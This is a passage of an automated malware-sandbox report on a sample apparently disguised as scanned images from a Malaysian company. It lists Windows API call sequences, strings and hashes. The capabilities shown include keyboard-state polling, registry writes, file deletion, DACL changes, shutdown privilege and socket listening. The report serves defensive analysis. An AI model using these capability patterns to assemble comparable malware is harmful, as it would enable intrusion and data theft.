                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A8F330
                                                        • FindClose.KERNEL32(00000000), ref: 00A8F33D
                                                        • FindClose.KERNEL32(00000000), ref: 00A8F34F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1803514871-438819550
                                                        • Opcode ID: 3802053921681cf5eab674b5f58d5cbab39eb8a344a6cb70a4050a4dcdf9f00e
                                                        • Instruction ID: 21faf1ed4cbf0946822a85e2f44c93f99d291270d8f0be4a652b3936a5344d00
                                                        • Opcode Fuzzy Hash: 3802053921681cf5eab674b5f58d5cbab39eb8a344a6cb70a4050a4dcdf9f00e
                                                        • Instruction Fuzzy Hash: E631C27660021A6EDF14EBF4EC48AEE77ACEF49361F104176E861D70A0EB70DA45CB64
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AA0BDE
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00AAF910,00000000,?,00000000,?,?), ref: 00AA0C4C
                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00AA0C94
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00AA0D1D
                                                        • RegCloseKey.ADVAPI32(?), ref: 00AA103D
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00AA104A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectCreateRegistryValue
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 536824911-966354055
                                                        • Opcode ID: e220f087fe0ebb04fb20348c0974dcafaf1aa2a7a2fae48fda9019b6e54a3947
                                                        • Instruction ID: 6918b18431bfeb01dcb7134b8ecb5466ac0ef77415082ce53b679030f29e11ec
                                                        • Opcode Fuzzy Hash: e220f087fe0ebb04fb20348c0974dcafaf1aa2a7a2fae48fda9019b6e54a3947
                                                        • Instruction Fuzzy Hash: E60270756006119FDB14EF28D981E2AB7E5FF89720F04896DF88A9B3A1CB31ED41CB41
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00A8F37E
                                                        • _wcscmp.LIBCMT ref: 00A8F393
                                                        • _wcscmp.LIBCMT ref: 00A8F3AA
                                                          • Part of subcall function 00A845C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A845DC
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00A8F3D9
                                                        • FindClose.KERNEL32(00000000), ref: 00A8F3E4
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00A8F400
                                                        • _wcscmp.LIBCMT ref: 00A8F427
                                                        • _wcscmp.LIBCMT ref: 00A8F43E
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A8F450
                                                        • SetCurrentDirectoryW.KERNEL32(00ADA5A0), ref: 00A8F46E
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A8F478
                                                        • FindClose.KERNEL32(00000000), ref: 00A8F485
                                                        • FindClose.KERNEL32(00000000), ref: 00A8F497
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 1824444939-438819550
                                                        • Opcode ID: 6b30d9f6a38588e012859a87214a17cbac43ac53c27a2ea740028a7237d119cf
                                                        • Instruction ID: 3d96f697e238c9cd62a88afd206b79f85130961642272d380fe2d77c03e26295
                                                        • Opcode Fuzzy Hash: 6b30d9f6a38588e012859a87214a17cbac43ac53c27a2ea740028a7237d119cf
                                                        • Instruction Fuzzy Hash: C631B37650121B6ECF14FBA4EC88ADE77ACAF49360F104276E850A71E0EB70DE55CB64
                                                        APIs
                                                          • Part of subcall function 00A7874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A78766
                                                          • Part of subcall function 00A7874A: GetLastError.KERNEL32(?,00A7822A,?,?,?), ref: 00A78770
                                                          • Part of subcall function 00A7874A: GetProcessHeap.KERNEL32(00000008,?,?,00A7822A,?,?,?), ref: 00A7877F
                                                          • Part of subcall function 00A7874A: HeapAlloc.KERNEL32(00000000,?,00A7822A,?,?,?), ref: 00A78786
                                                          • Part of subcall function 00A7874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A7879D
                                                          • Part of subcall function 00A787E7: GetProcessHeap.KERNEL32(00000008,00A78240,00000000,00000000,?,00A78240,?), ref: 00A787F3
                                                          • Part of subcall function 00A787E7: HeapAlloc.KERNEL32(00000000,?,00A78240,?), ref: 00A787FA
                                                          • Part of subcall function 00A787E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00A78240,?), ref: 00A7880B
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A7825B
                                                        • _memset.LIBCMT ref: 00A78270
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A7828F
                                                        • GetLengthSid.ADVAPI32(?), ref: 00A782A0
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00A782DD
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A782F9
                                                        • GetLengthSid.ADVAPI32(?), ref: 00A78316
                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00A78325
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00A7832C
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A7834D
                                                        • CopySid.ADVAPI32(00000000), ref: 00A78354
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A78385
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A783AB
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A783BF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 3996160137-0
                                                        • Opcode ID: 6ac0a9e96fd095a641e680d7bdf321bb7f28a38ca501202c24ea81a376b8bcc5
                                                        • Instruction ID: 3254058be71bb1b44bad31e364a28915d431dcda818d59f034b2724c0723b6e6
                                                        • Opcode Fuzzy Hash: 6ac0a9e96fd095a641e680d7bdf321bb7f28a38ca501202c24ea81a376b8bcc5
                                                        • Instruction Fuzzy Hash: 55616D7194020AAFDF14DF94DD48AEEBBB9FF04700F14C129F819AB291DB399A05DB60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                        • API String ID: 0-4052911093
                                                        • Opcode ID: d0816b622f4d32dd4b2686f0ec602c11eca104808971b252d56d99863bc78e00
                                                        • Instruction ID: 73e9e079a722f94eb83c1a4c13f52d4b77fd8211612918870096f21e989fffe1
                                                        • Opcode Fuzzy Hash: d0816b622f4d32dd4b2686f0ec602c11eca104808971b252d56d99863bc78e00
                                                        • Instruction Fuzzy Hash: DB725D75E002199BDB24CF59C8907AEB7F5FF48710F15C16AE949EB280EB749E81CB90
                                                        APIs
                                                          • Part of subcall function 00AA10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AA0038,?,?), ref: 00AA10BC
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AA0737
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00AA07D6
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00AA086E
                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00AA0AAD
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00AA0ABA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1240663315-0
                                                        • Opcode ID: 18343bd950d40883f6fb0dece0968ffb00f761bf21a94228a169dfb8c7fe3604
                                                        • Instruction ID: 67afd206514213d4f7dd0667eefb12beba9dce4e8c59b0d5ff015867d9e6afd5
                                                        • Opcode Fuzzy Hash: 18343bd950d40883f6fb0dece0968ffb00f761bf21a94228a169dfb8c7fe3604
                                                        • Instruction Fuzzy Hash: 51E13C31604211AFCB14DF28C995E2BBBF4EF89754F04896DF48ADB2A1DB31E901CB51
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00A80241
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00A802C2
                                                        • GetKeyState.USER32(000000A0), ref: 00A802DD
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00A802F7
                                                        • GetKeyState.USER32(000000A1), ref: 00A8030C
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00A80324
                                                        • GetKeyState.USER32(00000011), ref: 00A80336
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00A8034E
                                                        • GetKeyState.USER32(00000012), ref: 00A80360
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00A80378
                                                        • GetKeyState.USER32(0000005B), ref: 00A8038A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: 8351cb299bc0b528de40b45a1eea11326309c3ee0db25507ba065c82621d5e59
                                                        • Instruction ID: 116c0b5cba3debb84fbce4c40d79e18aa5a1a79252b7955c35aa64671b0ad9de
                                                        • Opcode Fuzzy Hash: 8351cb299bc0b528de40b45a1eea11326309c3ee0db25507ba065c82621d5e59
                                                        • Instruction Fuzzy Hash: E841AD349047CA6EFFB5ABA48808BF5BEA0BF12344F08409DD6C55A1C2E7D45DCC8792
                                                        APIs
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        • CoInitialize.OLE32 ref: 00A98718
                                                        • CoUninitialize.OLE32 ref: 00A98723
                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00AB2BEC,?), ref: 00A98783
                                                        • IIDFromString.OLE32(?,?), ref: 00A987F6
                                                        • VariantInit.OLEAUT32(?), ref: 00A98890
                                                        • VariantClear.OLEAUT32(?), ref: 00A988F1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 834269672-1287834457
                                                        • Opcode ID: c4ad920fc682b86eff21ea870db643d055011cc63ca4887b423dbcddb30267ba
                                                        • Instruction ID: 5a9305c173f68f6fff11a0bb209646579bcf350f0577743a0e463492a8ace448
                                                        • Opcode Fuzzy Hash: c4ad920fc682b86eff21ea870db643d055011cc63ca4887b423dbcddb30267ba
                                                        • Instruction Fuzzy Hash: 2661A170708311AFDB10DFA4C944B6BB7E8AF4A754F10481DF9859B291DB78ED44CBA2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: ea80ce4715875b3777b9d2a9cdaa1bf81490bd011fd1ca346da06e263d12f99b
                                                        • Instruction ID: abf55f6c0fc2f42c710a1d471fdc899b6d76339529bf52ae54709a9321e8f580
                                                        • Opcode Fuzzy Hash: ea80ce4715875b3777b9d2a9cdaa1bf81490bd011fd1ca346da06e263d12f99b
                                                        • Instruction Fuzzy Hash: B3219F357006219FDB15EFA4ED49F6A7BA8EF49751F10802AF946DB2A1DB30AC02CB54
                                                        APIs
                                                          • Part of subcall function 00A248AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A248A1,?,?,00A237C0,?), ref: 00A248CE
                                                          • Part of subcall function 00A84CD3: GetFileAttributesW.KERNEL32(?,00A83947), ref: 00A84CD4
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00A83ADF
                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00A83B87
                                                        • MoveFileW.KERNEL32(?,?), ref: 00A83B9A
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00A83BB7
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A83BD9
                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00A83BF5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 4002782344-1173974218
                                                        • Opcode ID: 60f7722dc7c7758a37c81c5c2fb584e4fae04fc1e2973c30b32f5e93bb2b80b1
                                                        • Instruction ID: acbeea636d3572edc9f24f31ed0be638e7f6b3b5a770026556ec2deec0056d82
                                                        • Opcode Fuzzy Hash: 60f7722dc7c7758a37c81c5c2fb584e4fae04fc1e2973c30b32f5e93bb2b80b1
                                                        • Instruction Fuzzy Hash: 6A518D728052599ACF15FBE4DE969EDB7B8AF14300F6441A9E44277091EF316F0DCBA0
                                                        APIs
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00A8F6AB
                                                        • Sleep.KERNEL32(0000000A), ref: 00A8F6DB
                                                        • _wcscmp.LIBCMT ref: 00A8F6EF
                                                        • _wcscmp.LIBCMT ref: 00A8F70A
                                                        • FindNextFileW.KERNEL32(?,?), ref: 00A8F7A8
                                                        • FindClose.KERNEL32(00000000), ref: 00A8F7BE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                        • String ID: *.*
                                                        • API String ID: 713712311-438819550
                                                        • Opcode ID: 7397f5aa2764338236c1c54378eacbcbf367c8ea4ffc529dec4292811b7556c0
                                                        • Instruction ID: d85dd7982ae3b722d5f1c3e0abe50b0d2afa38991072462db845e019617d0d03
                                                        • Opcode Fuzzy Hash: 7397f5aa2764338236c1c54378eacbcbf367c8ea4ffc529dec4292811b7556c0
                                                        • Instruction Fuzzy Hash: 8D416F7190021AAFDF15EFA4DD85AEEBBB4FF05310F144566E815A31A0EB309E54CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                        • API String ID: 0-1546025612
                                                        • Opcode ID: c2bf51fd04eb1d8f63704830b5495fbdb4b384a8f6d5414b2c0d8333928fed7b
                                                        • Instruction ID: b19b306de6c1c34358e9c925b0c2c6d9dd5e3f1b91e19b8b59b9b07874b0517b
                                                        • Opcode Fuzzy Hash: c2bf51fd04eb1d8f63704830b5495fbdb4b384a8f6d5414b2c0d8333928fed7b
                                                        • Instruction Fuzzy Hash: 53A29270E0421ACBDF24CF58C9507ADB7B1FF59314F2486AAE856A7280E774AE85CF50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: f13ec990ed906c953a1e0eacdfa31e9060af4ad1f4c8aa09a2199a0577ffef80
                                                        • Instruction ID: 00a2110ecba4cbaa2859f3a94405131f26556076fcc9ad64996b12580d1cc2e0
                                                        • Opcode Fuzzy Hash: f13ec990ed906c953a1e0eacdfa31e9060af4ad1f4c8aa09a2199a0577ffef80
                                                        • Instruction Fuzzy Hash: 46126B70E00609DFDF14DFA9DA85AAEB7F5FF48300F108669E406A7291EB35AE15CB50
                                                        APIs
                                                          • Part of subcall function 00A78CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A78D0D
                                                          • Part of subcall function 00A78CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A78D3A
                                                          • Part of subcall function 00A78CC3: GetLastError.KERNEL32 ref: 00A78D47
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00A8549B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                        • String ID: $@$SeShutdownPrivilege
                                                        • API String ID: 2234035333-194228
                                                        • Opcode ID: ff397a7be29697e31fd6157ecdc0df08340f4764591c06f2e212bcd70c87b0d6
                                                        • Instruction ID: a63292cabd5e9eb0bf03bbdcf4cf3f49c524e00dc24f183c9beac906d7ae29ef
                                                        • Opcode Fuzzy Hash: ff397a7be29697e31fd6157ecdc0df08340f4764591c06f2e212bcd70c87b0d6
                                                        • Instruction Fuzzy Hash: 95017B31E94B022EE72CB3B8DC4ABBA7269EB02743F200031FC07D20C3DA644C808390
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00A965EF
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A965FE
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00A9661A
                                                        • listen.WSOCK32(00000000,00000005), ref: 00A96629
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A96643
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00A96657
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
